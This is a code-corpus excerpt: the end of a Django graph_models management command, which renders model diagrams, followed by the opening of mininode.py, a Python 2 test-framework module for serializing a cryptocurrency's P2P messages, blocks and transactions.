'action': 'store_true',
'default': False,
'dest': 'dot',
'help': 'Output graph data as raw DOT (graph description language) text data.',
},
'--json': {
'action': 'store_true',
'default': False,
'dest': 'json',
'help': 'Output graph data as JSON',
},
'--disable-fields -d': {
'action': 'store_true',
'default': False,
'dest': 'disable_fields',
'help': 'Do not show the class member fields',
},
'--disable-abstract-fields': {
'action': 'store_true',
'default': False,
'dest': 'disable_abstract_fields',
'help': 'Do not show the class member fields that were inherited',
},
'--group-models -g': {
'action': 'store_true',
'default': False,
'dest': 'group_models',
'help': 'Group models together respective to their application',
},
'--all-applications -a': {
'action': 'store_true',
'default': False,
'dest': 'all_applications',
'help': 'Automatically include all applications from INSTALLED_APPS',
},
'--output -o': {
'action': 'store',
'dest': 'outputfile',
'help': 'Render output file. Type of output dependend on file extensions. Use png or jpg to render graph to image.',
},
'--layout -l': {
'action': 'store',
'dest': 'layout',
'default': 'dot',
'help': 'Layout to be used by GraphViz for visualization. Layouts: circo dot fdp neato nop nop1 nop2 twopi',
},
'--verbose-names -n': {
'action': 'store_true',
'default': False,
'dest': 'verbose_names',
'help': 'Use verbose_name of models and fields',
},
'--language -L': {
'action': 'store',
'dest': 'language',
'help': 'Specify language used for verbose_name localization',
},
'--exclude-columns -x': {
'action': 'store',
'dest': 'exclude_columns',
'help': 'Exclude specific column(s) from the graph. Can also load exclude list from file.',
},
'--exclude-models -X': {
'action': 'store',
'dest': 'exclude_models',
'help': 'Exclude specific model(s) from the graph. Can also load exclude list from file. Wildcards (*) are allowed.',
},
'--include-models -I': {
'action': 'store',
'dest': 'include_models',
'help': 'Restrict the graph to specified models. Wildcards (*) are allowed.',
},
'--inheritance -e': {
'action': 'store_true',
'default': True,
'dest': 'inheritance',
'help': 'Include inheritance arrows (default)',
},
'--no-inheritance -E': {
'action': 'store_false',
'default': False,
'dest': 'inheritance',
'help': 'Do not include inheritance arrows',
},
'--hide-relations-from-fields -R': {
'action': 'store_false',
'default': True,
'dest': 'relations_as_fields',
'help': 'Do not show relations as fields in the graph.',
},
'--disable-sort-fields -S': {
'action': 'store_false',
'default': True,
'dest': 'sort_fields',
'help': 'Do not sort fields',
},
}
defaults = getattr(settings, 'GRAPH_MODELS', None)
if defaults:
for argument in self.arguments:
arg_split = argument.split(' ')
setting_opt = arg_split[0].lstrip('-').replace('-', '_')
if setting_opt in defaults:
self.arguments[argument]['default'] = defaults[setting_opt]
super(Command, self).__init__(*args, **kwargs)
def add_arguments(self, parser):
"""Unpack self.arguments for parser.add_arguments."""
parser.add_argument('app_label', nargs='*')
for argument in self.arguments:
parser.add_argument(*argument.split(' '), **self.arguments[argument])
@signalcommand
def handle(self, *args, **options):
args = options['app_label']
if not args and not options['all_applications']:
raise CommandError("need one or more arguments for appname")
# determine output format based on options, file extension, and library
# availability
outputfile = options.get("outputfile") or ""
_, outputfile_ext = os.path.splitext(outputfile)
outputfile_ext = outputfile_ext.lower()
output_opts_names = ['pydot', 'pygraphviz', 'json', 'dot']
output_opts = {k: v for k, v in options.items() if k in output_opts_names}
output_opts_count = sum(output_opts.values())
if output_opts_count > 1:
raise CommandError("Only one of %s can be set." % ", ".join(["--%s" % opt for opt in output_opts_names]))
if output_opts_count == 1:
output = next(key for key, val in output_opts.items() if val)
elif not outputfile:
# When neither outputfile nor a output format option are set,
# default to printing .dot format to stdout. Kept for backward
# compatibility.
output = "dot"
elif outputfile_ext == ".dot":
output = "dot"
elif outputfile_ext == ".json":
output = "json"
elif HAS_PYGRAPHVIZ:
output = "pygraphviz"
elif HAS_PYDOT:
output = "pydot"
else:
raise CommandError("Neither pygraphviz nor pydotplus could be found to generate the image. To generate text output, use the --json or --dot options.")
# Consistency check: Abort if --pygraphviz or --pydot options are set
# but no outputfile is specified. Before 2.1.4 this silently fell back
# to printind .dot format to stdout.
if output in ["pydot", "pygraphviz"] and not outputfile:
raise CommandError("An output file (--output) must be specified when --pydot or --pygraphviz are set.")
cli_options = ' '.join(sys.argv[2:])
graph_models = ModelGraph(args, cli_options=cli_options, **options)
graph_models.generate_graph_data()
if output == "json":
graph_data = graph_models.get_graph_data(as_json=True)
return self.render_output_json(graph_data, outputfile)
graph_data = graph_models.get_graph_data(as_json=False)
dotdata = generate_dot(graph_data)
if not six.PY3:
dotdata = dotdata.encode("utf-8")
if output == "pygraphviz":
return self.render_output_pygraphviz(dotdata, **options)
if output == "pydot":
return self.render_output_pydot(dotdata, **options)
self.print_output(dotdata, outputfile)
def print_output(self, dotdata, output_file=None):
"""Write model data to file or stdout in DOT (text) format."""
if six.PY3 and isinstance(dotdata, six.binary_type):
dotdata = dotdata.decode()
if output_file:
with open(output_file, 'wt') as dot_output_f:
dot_output_f.write(dotdata)
else:
self.stdout.write(dotdata)
def render_output_json(self, graph_data, output_file=None):
"""Write model data to file or stdout in JSON format."""
if output_file:
with open(output_file, 'wt') as json_output_f:
json.dump(graph_data, json_output_f)
else:
self.stdout.write(json.dumps(graph_data))
def render_output_pygraphviz(self, dotdata, **kwargs):
"""Render model data as image using pygraphviz"""
if not HAS_PYGRAPHVIZ:
raise CommandError("You need to install pygraphviz python module")
version = pygraphviz.__version__.rstrip("-svn")
try:
if tuple(int(v) for v in version.split('.')) < (0, 36):
# HACK around old/broken AGraph before version 0.36 (ubuntu ships with this old version)
tmpfile = tempfile.NamedTemporaryFile()
tmpfile.write(dotdata)
tmpfile.seek(0)
dotdata = tmpfile.name
except ValueError:
pass
graph = pygraphviz.AGraph(dotdata)
graph.layout(prog=kwargs['layout'])
graph.draw(kwargs['outputfile'])
def render_output_pydot(self, dotdata, **kwargs):
"""Render model data as image using pydot"""
if not HAS_PYDOT:
raise CommandError("You need to install pydot python module")
graph = pydot.graph_from_dot_data(dotdata)
if not graph:
raise CommandError("pydot returned an error")
if isinstance(graph, (list, tuple)):
if len(graph) > 1:
sys.stderr.write("Found more then one graph, rendering only the first one.\n")
graph = graph[0]
output_file = kwargs['outputfile']
formats = [
'bmp', 'canon', 'cmap', 'cmapx', 'cmapx_np', 'dot', 'dia', 'emf',
'em', 'fplus', 'eps', 'fig', 'gd', 'gd2', 'gif', 'gv', 'imap',
'imap_np', 'ismap', 'jpe', 'jpeg', 'jpg', 'metafile', 'pdf',
'pic', 'plain', 'plain-ext', 'png', 'pov', 'ps', 'ps2', 'svg',
'svgz', 'tif', 'tiff', 'tk', 'vml', 'vmlz', 'vrml', 'wbmp', 'xdot',
]
ext = output_file[output_file.rfind('.') + 1:]
format_ = ext if ext in formats else 'raw'
graph.write(output_file, format=format_)
| 40.338926 | 194 | 0.546294 |
fc464cc39c7a9db9cf3895c1311e7dabc8f105e9 | 39,124 | py | Python | qa/rpc-tests/test_framework/mininode.py | globalmovementclub/globalmovementclub | be5123a8e199cbe584963eedbe7e6f57e50374a1 | [
"MIT"
] | 1 | 2020-01-11T17:22:09.000Z | 2020-01-11T17:22:09.000Z | qa/rpc-tests/test_framework/mininode.py | grandmastercoin/grandmastercoin | be5123a8e199cbe584963eedbe7e6f57e50374a1 | [
"MIT"
] | 1 | 2020-09-24T02:21:29.000Z | 2020-09-24T02:21:29.000Z | qa/rpc-tests/test_framework/mininode.py | globalmovementclub/globalmovementclub | be5123a8e199cbe584963eedbe7e6f57e50374a1 | [
"MIT"
] | 1 | 2019-07-06T03:37:05.000Z | 2019-07-06T03:37:05.000Z | # mininode.py - GlobalMovementClub P2P network half-a-node
#
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# This python code was modified from ArtForz' public domain half-a-node, as
# found in the mini-node branch of http://github.com/jgarzik/pynode.
#
# NodeConn: an object which manages p2p connectivity to a globalmovementclub node
# NodeConnCB: a base class that describes the interface for receiving
# callbacks with network messages from a NodeConn
# CBlock, CTransaction, CBlockHeader, CTxIn, CTxOut, etc....:
# data structures that should map to corresponding structures in
# globalmovementclub/primitives
# msg_block, msg_tx, msg_headers, etc.:
# data structures that represent network messages
# ser_*, deser_*: functions that handle serialization/deserialization
import struct
import socket
import asyncore
import time
import sys
import random
from binascii import hexlify, unhexlify
from io import BytesIO
from codecs import encode
import hashlib
from threading import RLock
from threading import Thread
import logging
import copy
import globalmovementclub_hash
BIP0031_VERSION = 60000
MY_VERSION = 70208 # current MIN_PEER_PROTO_VERSION
MY_SUBVERSION = b"/python-mininode-tester:0.0.2/"
MAX_INV_SZ = 50000
MAX_BLOCK_SIZE = 1000000
COIN = 100000000L # 1 btc in satoshis
# Keep our own socket map for asyncore, so that we can track disconnects
# ourselves (to workaround an issue with closing an asyncore socket when
# using select)
mininode_socket_map = dict()
# One lock for synchronizing all data access between the networking thread (see
# NetworkThread below) and the thread running the test logic. For simplicity,
# NodeConn acquires this lock whenever delivering a message to to a NodeConnCB,
# and whenever adding anything to the send buffer (in send_message()). This
# lock should be acquired in the thread running the test logic to synchronize
# access to any data shared with the NodeConnCB or NodeConn.
mininode_lock = RLock()
# Serialization/deserialization tools
def sha256(s):
return hashlib.new('sha256', s).digest()
def hash256(s):
return sha256(sha256(s))
def globalmovementclubhash(s):
return globalmovementclub_hash.getPoWHash(s)
def deser_string(f):
nit = struct.unpack("<B", f.read(1))[0]
if nit == 253:
nit = struct.unpack("<H", f.read(2))[0]
elif nit == 254:
nit = struct.unpack("<I", f.read(4))[0]
elif nit == 255:
nit = struct.unpack("<Q", f.read(8))[0]
return f.read(nit)
def ser_string(s):
if len(s) < 253:
return struct.pack("B", len(s)) + s
elif len(s) < 0x10000:
return struct.pack("<BH", 253, len(s)) + s
elif len(s) < 0x100000000L:
return struct.pack("<BI", 254, len(s)) + s
return struct.pack("<BQ", 255, len(s)) + s
def deser_uint256(f):
r = 0L
for i in xrange(8):
t = struct.unpack("<I", f.read(4))[0]
r += t << (i * 32)
return r
def ser_uint256(u):
rs = b""
for i in xrange(8):
rs += struct.pack("<I", u & 0xFFFFFFFFL)
u >>= 32
return rs
def uint256_from_str(s):
r = 0L
t = struct.unpack("<IIIIIIII", s[:32])
for i in xrange(8):
r += t[i] << (i * 32)
return r
def uint256_from_compact(c):
nbytes = (c >> 24) & 0xFF
v = (c & 0xFFFFFFL) << (8 * (nbytes - 3))
return v
def deser_vector(f, c):
nit = struct.unpack("<B", f.read(1))[0]
if nit == 253:
nit = struct.unpack("<H", f.read(2))[0]
elif nit == 254:
nit = struct.unpack("<I", f.read(4))[0]
elif nit == 255:
nit = struct.unpack("<Q", f.read(8))[0]
r = []
for i in xrange(nit):
t = c()
t.deserialize(f)
r.append(t)
return r
def ser_vector(l):
r = b""
if len(l) < 253:
r = struct.pack("B", len(l))
elif len(l) < 0x10000:
r = struct.pack("<BH", 253, len(l))
elif len(l) < 0x100000000L:
r = struct.pack("<BI", 254, len(l))
else:
r = struct.pack("<BQ", 255, len(l))
for i in l:
r += i.serialize()
return r
def deser_uint256_vector(f):
nit = struct.unpack("<B", f.read(1))[0]
if nit == 253:
nit = struct.unpack("<H", f.read(2))[0]
elif nit == 254:
nit = struct.unpack("<I", f.read(4))[0]
elif nit == 255:
nit = struct.unpack("<Q", f.read(8))[0]
r = []
for i in xrange(nit):
t = deser_uint256(f)
r.append(t)
return r
def ser_uint256_vector(l):
r = b""
if len(l) < 253:
r = struct.pack("B", len(l))
elif len(l) < 0x10000:
r = struct.pack("<BH", 253, len(l))
elif len(l) < 0x100000000L:
r = struct.pack("<BI", 254, len(l))
else:
r = struct.pack("<BQ", 255, len(l))
for i in l:
r += ser_uint256(i)
return r
def deser_string_vector(f):
nit = struct.unpack("<B", f.read(1))[0]
if nit == 253:
nit = struct.unpack("<H", f.read(2))[0]
elif nit == 254:
nit = struct.unpack("<I", f.read(4))[0]
elif nit == 255:
nit = struct.unpack("<Q", f.read(8))[0]
r = []
for i in xrange(nit):
t = deser_string(f)
r.append(t)
return r
def ser_string_vector(l):
r = b""
if len(l) < 253:
r = struct.pack("B", len(l))
elif len(l) < 0x10000:
r = struct.pack("<BH", 253, len(l))
elif len(l) < 0x100000000L:
r = struct.pack("<BI", 254, len(l))
else:
r = struct.pack("<BQ", 255, len(l))
for sv in l:
r += ser_string(sv)
return r
def deser_int_vector(f):
nit = struct.unpack("<B", f.read(1))[0]
if nit == 253:
nit = struct.unpack("<H", f.read(2))[0]
elif nit == 254:
nit = struct.unpack("<I", f.read(4))[0]
elif nit == 255:
nit = struct.unpack("<Q", f.read(8))[0]
r = []
for i in xrange(nit):
t = struct.unpack("<i", f.read(4))[0]
r.append(t)
return r
def ser_int_vector(l):
r = b""
if len(l) < 253:
r = struct.pack("B", len(l))
elif len(l) < 0x10000:
r = struct.pack("<BH", 253, len(l))
elif len(l) < 0x100000000L:
r = struct.pack("<BI", 254, len(l))
else:
r = struct.pack("<BQ", 255, len(l))
for i in l:
r += struct.pack("<i", i)
return r
# Deserialize from a hex string representation (eg from RPC)
def FromHex(obj, hex_string):
obj.deserialize(BytesIO(unhexlify(hex_string.encode('ascii'))))
return obj
# Convert a binary-serializable object to hex (eg for submission via RPC)
def ToHex(obj):
return hexlify(obj.serialize()).decode('ascii')
# Objects that map to gmcd objects, which can be serialized/deserialized
class CAddress(object):
def __init__(self):
self.nServices = 1
self.pchReserved = b"\x00" * 10 + b"\xff" * 2
self.ip = "0.0.0.0"
self.port = 0
def deserialize(self, f):
self.nServices = struct.unpack("<Q", f.read(8))[0]
self.pchReserved = f.read(12)
self.ip = socket.inet_ntoa(f.read(4))
self.port = struct.unpack(">H", f.read(2))[0]
def serialize(self):
r = b""
r += struct.pack("<Q", self.nServices)
r += self.pchReserved
r += socket.inet_aton(self.ip)
r += struct.pack(">H", self.port)
return r
def __repr__(self):
return "CAddress(nServices=%i ip=%s port=%i)" % (self.nServices,
self.ip, self.port)
class CInv(object):
typemap = {
0: "Error",
1: "TX",
2: "Block"}
def __init__(self, t=0, h=0L):
self.type = t
self.hash = h
def deserialize(self, f):
self.type = struct.unpack("<i", f.read(4))[0]
self.hash = deser_uint256(f)
def serialize(self):
r = b""
r += struct.pack("<i", self.type)
r += ser_uint256(self.hash)
return r
def __repr__(self):
return "CInv(type=%s hash=%064x)" \
% (self.typemap[self.type], self.hash)
class CBlockLocator(object):
def __init__(self):
self.nVersion = MY_VERSION
self.vHave = []
def deserialize(self, f):
self.nVersion = struct.unpack("<i", f.read(4))[0]
self.vHave = deser_uint256_vector(f)
def serialize(self):
r = b""
r += struct.pack("<i", self.nVersion)
r += ser_uint256_vector(self.vHave)
return r
def __repr__(self):
return "CBlockLocator(nVersion=%i vHave=%s)" \
% (self.nVersion, repr(self.vHave))
class COutPoint(object):
def __init__(self, hash=0, n=0):
self.hash = hash
self.n = n
def deserialize(self, f):
self.hash = deser_uint256(f)
self.n = struct.unpack("<I", f.read(4))[0]
def serialize(self):
r = b""
r += ser_uint256(self.hash)
r += struct.pack("<I", self.n)
return r
def __repr__(self):
return "COutPoint(hash=%064x n=%i)" % (self.hash, self.n)
class CTxIn(object):
def __init__(self, outpoint=None, scriptSig=b"", nSequence=0):
if outpoint is None:
self.prevout = COutPoint()
else:
self.prevout = outpoint
self.scriptSig = scriptSig
self.nSequence = nSequence
def deserialize(self, f):
self.prevout = COutPoint()
self.prevout.deserialize(f)
self.scriptSig = deser_string(f)
self.nSequence = struct.unpack("<I", f.read(4))[0]
def serialize(self):
r = b""
r += self.prevout.serialize()
r += ser_string(self.scriptSig)
r += struct.pack("<I", self.nSequence)
return r
def __repr__(self):
return "CTxIn(prevout=%s scriptSig=%s nSequence=%i)" \
% (repr(self.prevout), hexlify(self.scriptSig),
self.nSequence)
class CTxOut(object):
def __init__(self, nValue=0, scriptPubKey=b""):
self.nValue = nValue
self.scriptPubKey = scriptPubKey
def deserialize(self, f):
self.nValue = struct.unpack("<q", f.read(8))[0]
self.scriptPubKey = deser_string(f)
def serialize(self):
r = b""
r += struct.pack("<q", self.nValue)
r += ser_string(self.scriptPubKey)
return r
def __repr__(self):
return "CTxOut(nValue=%i.%08i scriptPubKey=%s)" \
% (self.nValue // COIN, self.nValue % COIN,
hexlify(self.scriptPubKey))
class CTransaction(object):
def __init__(self, tx=None):
if tx is None:
self.nVersion = 1
self.vin = []
self.vout = []
self.nLockTime = 0
self.sha256 = None
self.hash = None
else:
self.nVersion = tx.nVersion
self.vin = copy.deepcopy(tx.vin)
self.vout = copy.deepcopy(tx.vout)
self.nLockTime = tx.nLockTime
self.sha256 = None
self.hash = None
def deserialize(self, f):
self.nVersion = struct.unpack("<i", f.read(4))[0]
self.vin = deser_vector(f, CTxIn)
self.vout = deser_vector(f, CTxOut)
self.nLockTime = struct.unpack("<I", f.read(4))[0]
self.sha256 = None
self.hash = None
def serialize(self):
r = b""
r += struct.pack("<i", self.nVersion)
r += ser_vector(self.vin)
r += ser_vector(self.vout)
r += struct.pack("<I", self.nLockTime)
return r
def rehash(self):
self.sha256 = None
self.calc_sha256()
def calc_sha256(self):
if self.sha256 is None:
self.sha256 = uint256_from_str(hash256(self.serialize()))
self.hash = encode(hash256(self.serialize())[::-1], 'hex_codec').decode('ascii')
def is_valid(self):
self.calc_sha256()
for tout in self.vout:
if tout.nValue < 0 or tout.nValue > 21000000 * COIN:
return False
return True
def __repr__(self):
return "CTransaction(nVersion=%i vin=%s vout=%s nLockTime=%i)" \
% (self.nVersion, repr(self.vin), repr(self.vout), self.nLockTime)
class CBlockHeader(object):
def __init__(self, header=None):
if header is None:
self.set_null()
else:
self.nVersion = header.nVersion
self.hashPrevBlock = header.hashPrevBlock
self.hashMerkleRoot = header.hashMerkleRoot
self.nTime = header.nTime
self.nBits = header.nBits
self.nNonce = header.nNonce
self.sha256 = header.sha256
self.hash = header.hash
self.calc_sha256()
def set_null(self):
self.nVersion = 1
self.hashPrevBlock = 0
self.hashMerkleRoot = 0
self.nTime = 0
self.nBits = 0
self.nNonce = 0
self.sha256 = None
self.hash = None
def deserialize(self, f):
self.nVersion = struct.unpack("<i", f.read(4))[0]
self.hashPrevBlock = deser_uint256(f)
self.hashMerkleRoot = deser_uint256(f)
self.nTime = struct.unpack("<I", f.read(4))[0]
self.nBits = struct.unpack("<I", f.read(4))[0]
self.nNonce = struct.unpack("<I", f.read(4))[0]
self.sha256 = None
self.hash = None
def serialize(self):
r = b""
r += struct.pack("<i", self.nVersion)
r += ser_uint256(self.hashPrevBlock)
r += ser_uint256(self.hashMerkleRoot)
r += struct.pack("<I", self.nTime)
r += struct.pack("<I", self.nBits)
r += struct.pack("<I", self.nNonce)
return r
def calc_sha256(self):
if self.sha256 is None:
r = b""
r += struct.pack("<i", self.nVersion)
r += ser_uint256(self.hashPrevBlock)
r += ser_uint256(self.hashMerkleRoot)
r += struct.pack("<I", self.nTime)
r += struct.pack("<I", self.nBits)
r += struct.pack("<I", self.nNonce)
self.sha256 = uint256_from_str(globalmovementclubhash(r))
self.hash = encode(globalmovementclubhash(r)[::-1], 'hex_codec').decode('ascii')
def rehash(self):
self.sha256 = None
self.calc_sha256()
return self.sha256
def __repr__(self):
return "CBlockHeader(nVersion=%i hashPrevBlock=%064x hashMerkleRoot=%064x nTime=%s nBits=%08x nNonce=%08x)" \
% (self.nVersion, self.hashPrevBlock, self.hashMerkleRoot,
time.ctime(self.nTime), self.nBits, self.nNonce)
class CBlock(CBlockHeader):
def __init__(self, header=None):
super(CBlock, self).__init__(header)
self.vtx = []
def deserialize(self, f):
super(CBlock, self).deserialize(f)
self.vtx = deser_vector(f, CTransaction)
def serialize(self):
r = b""
r += super(CBlock, self).serialize()
r += ser_vector(self.vtx)
return r
def calc_merkle_root(self):
hashes = []
for tx in self.vtx:
tx.calc_sha256()
hashes.append(ser_uint256(tx.sha256))
while len(hashes) > 1:
newhashes = []
for i in xrange(0, len(hashes), 2):
i2 = min(i+1, len(hashes)-1)
newhashes.append(hash256(hashes[i] + hashes[i2]))
hashes = newhashes
return uint256_from_str(hashes[0])
def is_valid(self):
self.calc_sha256()
target = uint256_from_compact(self.nBits)
if self.sha256 > target:
return False
for tx in self.vtx:
if not tx.is_valid():
return False
if self.calc_merkle_root() != self.hashMerkleRoot:
return False
return True
def solve(self):
self.rehash()
target = uint256_from_compact(self.nBits)
while self.sha256 > target:
self.nNonce += 1
self.rehash()
def __repr__(self):
return "CBlock(nVersion=%i hashPrevBlock=%064x hashMerkleRoot=%064x nTime=%s nBits=%08x nNonce=%08x vtx=%s)" \
% (self.nVersion, self.hashPrevBlock, self.hashMerkleRoot,
time.ctime(self.nTime), self.nBits, self.nNonce, repr(self.vtx))
class CUnsignedAlert(object):
def __init__(self):
self.nVersion = 1
self.nRelayUntil = 0
self.nExpiration = 0
self.nID = 0
self.nCancel = 0
self.setCancel = []
self.nMinVer = 0
self.nMaxVer = 0
self.setSubVer = []
self.nPriority = 0
self.strComment = b""
self.strStatusBar = b""
self.strReserved = b""
def deserialize(self, f):
self.nVersion = struct.unpack("<i", f.read(4))[0]
self.nRelayUntil = struct.unpack("<q", f.read(8))[0]
self.nExpiration = struct.unpack("<q", f.read(8))[0]
self.nID = struct.unpack("<i", f.read(4))[0]
self.nCancel = struct.unpack("<i", f.read(4))[0]
self.setCancel = deser_int_vector(f)
self.nMinVer = struct.unpack("<i", f.read(4))[0]
self.nMaxVer = struct.unpack("<i", f.read(4))[0]
self.setSubVer = deser_string_vector(f)
self.nPriority = struct.unpack("<i", f.read(4))[0]
self.strComment = deser_string(f)
self.strStatusBar = deser_string(f)
self.strReserved = deser_string(f)
def serialize(self):
r = b""
r += struct.pack("<i", self.nVersion)
r += struct.pack("<q", self.nRelayUntil)
r += struct.pack("<q", self.nExpiration)
r += struct.pack("<i", self.nID)
r += struct.pack("<i", self.nCancel)
r += ser_int_vector(self.setCancel)
r += struct.pack("<i", self.nMinVer)
r += struct.pack("<i", self.nMaxVer)
r += ser_string_vector(self.setSubVer)
r += struct.pack("<i", self.nPriority)
r += ser_string(self.strComment)
r += ser_string(self.strStatusBar)
r += ser_string(self.strReserved)
return r
def __repr__(self):
return "CUnsignedAlert(nVersion %d, nRelayUntil %d, nExpiration %d, nID %d, nCancel %d, nMinVer %d, nMaxVer %d, nPriority %d, strComment %s, strStatusBar %s, strReserved %s)" \
% (self.nVersion, self.nRelayUntil, self.nExpiration, self.nID,
self.nCancel, self.nMinVer, self.nMaxVer, self.nPriority,
self.strComment, self.strStatusBar, self.strReserved)
class CAlert(object):
def __init__(self):
self.vchMsg = b""
self.vchSig = b""
def deserialize(self, f):
self.vchMsg = deser_string(f)
self.vchSig = deser_string(f)
def serialize(self):
r = b""
r += ser_string(self.vchMsg)
r += ser_string(self.vchSig)
return r
def __repr__(self):
return "CAlert(vchMsg.sz %d, vchSig.sz %d)" \
% (len(self.vchMsg), len(self.vchSig))
# Objects that correspond to messages on the wire
class msg_version(object):
command = b"version"
def __init__(self):
self.nVersion = MY_VERSION
self.nServices = 1
self.nTime = int(time.time())
self.addrTo = CAddress()
self.addrFrom = CAddress()
self.nNonce = random.getrandbits(64)
self.strSubVer = MY_SUBVERSION
self.nStartingHeight = -1
def deserialize(self, f):
self.nVersion = struct.unpack("<i", f.read(4))[0]
if self.nVersion == 10300:
self.nVersion = 300
self.nServices = struct.unpack("<Q", f.read(8))[0]
self.nTime = struct.unpack("<q", f.read(8))[0]
self.addrTo = CAddress()
self.addrTo.deserialize(f)
if self.nVersion >= 106:
self.addrFrom = CAddress()
self.addrFrom.deserialize(f)
self.nNonce = struct.unpack("<Q", f.read(8))[0]
self.strSubVer = deser_string(f)
if self.nVersion >= 209:
self.nStartingHeight = struct.unpack("<i", f.read(4))[0]
else:
self.nStartingHeight = None
else:
self.addrFrom = None
self.nNonce = None
self.strSubVer = None
self.nStartingHeight = None
def serialize(self):
r = b""
r += struct.pack("<i", self.nVersion)
r += struct.pack("<Q", self.nServices)
r += struct.pack("<q", self.nTime)
r += self.addrTo.serialize()
r += self.addrFrom.serialize()
r += struct.pack("<Q", self.nNonce)
r += ser_string(self.strSubVer)
r += struct.pack("<i", self.nStartingHeight)
return r
def __repr__(self):
return 'msg_version(nVersion=%i nServices=%i nTime=%s addrTo=%s addrFrom=%s nNonce=0x%016X strSubVer=%s nStartingHeight=%i)' \
% (self.nVersion, self.nServices, time.ctime(self.nTime),
repr(self.addrTo), repr(self.addrFrom), self.nNonce,
self.strSubVer, self.nStartingHeight)
class msg_verack(object):
command = b"verack"
def __init__(self):
pass
def deserialize(self, f):
pass
def serialize(self):
return b""
def __repr__(self):
return "msg_verack()"
class msg_addr(object):
command = b"addr"
def __init__(self):
self.addrs = []
def deserialize(self, f):
self.addrs = deser_vector(f, CAddress)
def serialize(self):
return ser_vector(self.addrs)
def __repr__(self):
return "msg_addr(addrs=%s)" % (repr(self.addrs))
class msg_alert(object):
command = b"alert"
def __init__(self):
self.alert = CAlert()
def deserialize(self, f):
self.alert = CAlert()
self.alert.deserialize(f)
def serialize(self):
r = b""
r += self.alert.serialize()
return r
def __repr__(self):
return "msg_alert(alert=%s)" % (repr(self.alert), )
class msg_inv(object):
command = b"inv"
def __init__(self, inv=None):
if inv is None:
self.inv = []
else:
self.inv = inv
def deserialize(self, f):
self.inv = deser_vector(f, CInv)
def serialize(self):
return ser_vector(self.inv)
def __repr__(self):
return "msg_inv(inv=%s)" % (repr(self.inv))
class msg_getdata(object):
command = b"getdata"
def __init__(self, inv=None):
self.inv = inv if inv != None else []
def deserialize(self, f):
self.inv = deser_vector(f, CInv)
def serialize(self):
return ser_vector(self.inv)
def __repr__(self):
return "msg_getdata(inv=%s)" % (repr(self.inv))
class msg_getblocks(object):
command = b"getblocks"
def __init__(self):
self.locator = CBlockLocator()
self.hashstop = 0L
def deserialize(self, f):
self.locator = CBlockLocator()
self.locator.deserialize(f)
self.hashstop = deser_uint256(f)
def serialize(self):
r = b""
r += self.locator.serialize()
r += ser_uint256(self.hashstop)
return r
def __repr__(self):
return "msg_getblocks(locator=%s hashstop=%064x)" \
% (repr(self.locator), self.hashstop)
class msg_tx(object):
command = b"tx"
def __init__(self, tx=CTransaction()):
self.tx = tx
def deserialize(self, f):
self.tx.deserialize(f)
def serialize(self):
return self.tx.serialize()
def __repr__(self):
return "msg_tx(tx=%s)" % (repr(self.tx))
class msg_block(object):
command = b"block"
def __init__(self, block=None):
if block is None:
self.block = CBlock()
else:
self.block = block
def deserialize(self, f):
self.block.deserialize(f)
def serialize(self):
return self.block.serialize()
def __repr__(self):
return "msg_block(block=%s)" % (repr(self.block))
class msg_getaddr(object):
command = b"getaddr"
def __init__(self):
pass
def deserialize(self, f):
pass
def serialize(self):
return b""
def __repr__(self):
return "msg_getaddr()"
class msg_ping_prebip31(object):
command = b"ping"
def __init__(self):
pass
def deserialize(self, f):
pass
def serialize(self):
return b""
def __repr__(self):
return "msg_ping() (pre-bip31)"
class msg_ping(object):
command = b"ping"
def __init__(self, nonce=0L):
self.nonce = nonce
def deserialize(self, f):
self.nonce = struct.unpack("<Q", f.read(8))[0]
def serialize(self):
r = b""
r += struct.pack("<Q", self.nonce)
return r
def __repr__(self):
return "msg_ping(nonce=%08x)" % self.nonce
class msg_pong(object):
command = b"pong"
def __init__(self, nonce=0):
self.nonce = nonce
def deserialize(self, f):
self.nonce = struct.unpack("<Q", f.read(8))[0]
def serialize(self):
r = b""
r += struct.pack("<Q", self.nonce)
return r
def __repr__(self):
return "msg_pong(nonce=%08x)" % self.nonce
class msg_mempool(object):
command = b"mempool"
def __init__(self):
pass
def deserialize(self, f):
pass
def serialize(self):
return b""
def __repr__(self):
return "msg_mempool()"
class msg_sendheaders(object):
command = b"sendheaders"
def __init__(self):
pass
def deserialize(self, f):
pass
def serialize(self):
return b""
def __repr__(self):
return "msg_sendheaders()"
# getheaders message has
# number of entries
# vector of hashes
# hash_stop (hash of last desired block header, 0 to get as many as possible)
class msg_getheaders(object):
command = b"getheaders"
def __init__(self):
self.locator = CBlockLocator()
self.hashstop = 0L
def deserialize(self, f):
self.locator = CBlockLocator()
self.locator.deserialize(f)
self.hashstop = deser_uint256(f)
def serialize(self):
r = b""
r += self.locator.serialize()
r += ser_uint256(self.hashstop)
return r
def __repr__(self):
return "msg_getheaders(locator=%s, stop=%064x)" \
% (repr(self.locator), self.hashstop)
# headers message has
# <count> <vector of block headers>
class msg_headers(object):
command = b"headers"
def __init__(self):
self.headers = []
def deserialize(self, f):
# comment in gmcd indicates these should be deserialized as blocks
blocks = deser_vector(f, CBlock)
for x in blocks:
self.headers.append(CBlockHeader(x))
def serialize(self):
blocks = [CBlock(x) for x in self.headers]
return ser_vector(blocks)
def __repr__(self):
return "msg_headers(headers=%s)" % repr(self.headers)
class msg_reject(object):
command = b"reject"
REJECT_MALFORMED = 1
def __init__(self):
self.message = b""
self.code = 0
self.reason = b""
self.data = 0L
def deserialize(self, f):
self.message = deser_string(f)
self.code = struct.unpack("<B", f.read(1))[0]
self.reason = deser_string(f)
if (self.code != self.REJECT_MALFORMED and
(self.message == b"block" or self.message == b"tx")):
self.data = deser_uint256(f)
def serialize(self):
r = ser_string(self.message)
r += struct.pack("<B", self.code)
r += ser_string(self.reason)
if (self.code != self.REJECT_MALFORMED and
(self.message == b"block" or self.message == b"tx")):
r += ser_uint256(self.data)
return r
def __repr__(self):
return "msg_reject: %s %d %s [%064x]" \
% (self.message, self.code, self.reason, self.data)
# Helper function
def wait_until(predicate, attempts=float('inf'), timeout=float('inf')):
attempt = 0
elapsed = 0
while attempt < attempts and elapsed < timeout:
with mininode_lock:
if predicate():
return True
attempt += 1
elapsed += 0.05
time.sleep(0.05)
return False
# This is what a callback should look like for NodeConn
# Reimplement the on_* functions to provide handling for events
class NodeConnCB(object):
def __init__(self):
self.verack_received = False
# deliver_sleep_time is helpful for debugging race conditions in p2p
# tests; it causes message delivery to sleep for the specified time
# before acquiring the global lock and delivering the next message.
self.deliver_sleep_time = None
def set_deliver_sleep_time(self, value):
